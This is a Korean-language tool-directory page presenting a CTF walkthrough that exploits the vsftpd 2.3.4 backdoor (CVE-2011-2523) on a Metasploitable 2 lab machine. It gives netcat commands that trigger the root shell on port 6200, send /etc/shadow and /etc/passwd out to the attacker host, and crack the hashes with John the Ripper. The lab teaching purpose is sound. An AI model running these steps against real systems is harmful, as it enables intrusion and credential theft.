Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CTF---CVE-2011-2523 — vsftpd 2.3.4 백도어(CVE-2011-2523)를 악용하여 Metasploitable 2에서 /etc/shadow 및 /etc/passwd를 캡처하고 크랙하는 단계별 CTF 워크스루. | Kitploit
도구/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Password CrackingReconnaissanceVulnerability AnalysisExploitationInformation GatheringCTFPenetration TestingLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

vsftpd 2.3.4 백도어(CVE-2011-2523)를 악용하여 Metasploitable 2에서 /etc/shadow 및 /etc/passwd를 캡처하고 크랙하는 단계별 CTF 워크스루.

저장소 보기
43년 전아직 검토되지 않음

시나리오 Capture the Flag - CVE-2011-2523

취약한 Metasploitable 2 서버에서 복호화된 /etc/shadow 및 /etc/passwd 파일을 탈취하세요.

환경 설정

1단계: 가상 머신 다운로드 및 압축 풀기

이 CTF에서는 VMware Workstation Pro에서 두 개의 가상 머신을 실행합니다. 공격자 머신으로 Kali Linux를, 취약 머신으로 Metasploitable 2를 사용합니다.

  • VMware Workstation 다운로드 및 설치: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Kali Linux 가상 머신 다운로드 및 추출: https://www.kali.org/get-kali/
  • Metasploitable 2 가상 머신 다운로드 및 추출: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

2단계: 추출된 파일에서 VMware로 Kali Linux 및 Metasploitable 2 가상 머신 열기

  • VMware Workstation에서 Open a Virtual Machine 옵션을 선택하고 압축이 풀린 Kali Linux 파일을 선택합니다.
  • 슬라이드 바에서 마우스 오른쪽 버튼을 클릭하고 open 옵션을 선택한 후, 압축이 풀린 Metasploitable 2 파일을 선택합니다.
  • 두 가상 머신 모두에서 Play virtual machine 버튼을 누릅니다.
  • I moved It 또는 I copied It 옵션을 선택하라는 메시지가 나타나면 I copied It 옵션을 선택합니다.

3단계: 로그인

  • 사용자 이름과 비밀번호로 kali를 사용하여 Kali Linux에 로그인합니다.
  • 사용자 이름과 비밀번호로 msfadmin을 사용하여 Metasploitable에 로그인합니다.

4단계: Metasploitable 가상 머신의 IP 주소 기록

  • ip addr show를 실행하고 inet 섹션의 IP 주소를 기록합니다.

해결 방법

매사추세츠 공과대학교 연구 및 엔지니어링에서는 CVE-2011-2523을 다음과 같은 일반적인 취약점 및 노출로 설명합니다: vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.

1단계: FTP 서비스를 사용하여 Metasploitable 머신에서 열린 포트 검색

  • nmap <vulnerable-machine-ip-address>
  • nmap 스캔은 ftp 서비스를 사용하여 포트 21에서 열린 포트를 보여주어야 합니다.

2단계: NetCat으로 열린 포트에 연결 시도

  • nc <vulnerable-machine-ip-address> 21
  • 사용자 이름은 끝에 :)가 있는 임의의 문자열이며, user <string>:)을 입력합니다.
  • 비밀번호를 묻는 메시지가 나타나면 임의의 문자열 pass <string>을 입력합니다.
  • 그런 다음 ^C [CTRL + C]를 사용하여 연결을 종료하면 Metasploitable의 루트 셸이 포트 6200에 열립니다.

3단계: 취약 머신의 포트 6200에서 셸에 연결

  • nc -v <vulnerable-machine-ip-address> 6200
  • 현재 연결의 IP 주소 표시 ip addr show
  • whoami를 사용하여 루트 액세스 권한이 부여되었음을 확인

4단계: /etc/shadow 및 /etc/passwd 파일을 다른 파일로 복사

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

5단계: NetCat을 사용하여 복사된 파일을 Kali Linux 머신으로 전송

  • 공격자 머신에서 ip addr show 명령어를 사용하여 inet 아래의 IP 주소를 확인합니다.
  • 공격자 머신에서 nc -l -p 1234 > shadow.txt를 사용하여 파일 수신 대기
  • Metasploitable의 루트 셸에서 nc -w 3 <destination-ip> 1234 < shadow.txt
  • passwd 파일에 대해 반복

5단계: shadow 파일을 John 도구 형식으로 변환

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • cat unshadowed-input을 사용하여 파일을 확인하면 사용자 이름과 비밀번호가 저장되어 있어야 합니다.

6단계: John 명령과 단어 목록을 사용하여 shadow 파일 복호화

  • rockyou.txt 단어 목록을 사용하여 john으로 해시 크랙
  • Kali Linux에서 sudo gzip -d /usr/share/wordlists/rockyou.txt.gz를 사용하여 단어 목록 파일 압축 해제
  • 비밀번호를 묻는 메시지가 나타나면 Kali Linux의 기본 관리자 비밀번호 kali를 사용합니다.
  • john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt를 사용하여 비밀번호 해시 해제
  • 크랙된 비밀번호 보기 john –show unshadowed-input
도구 다운로드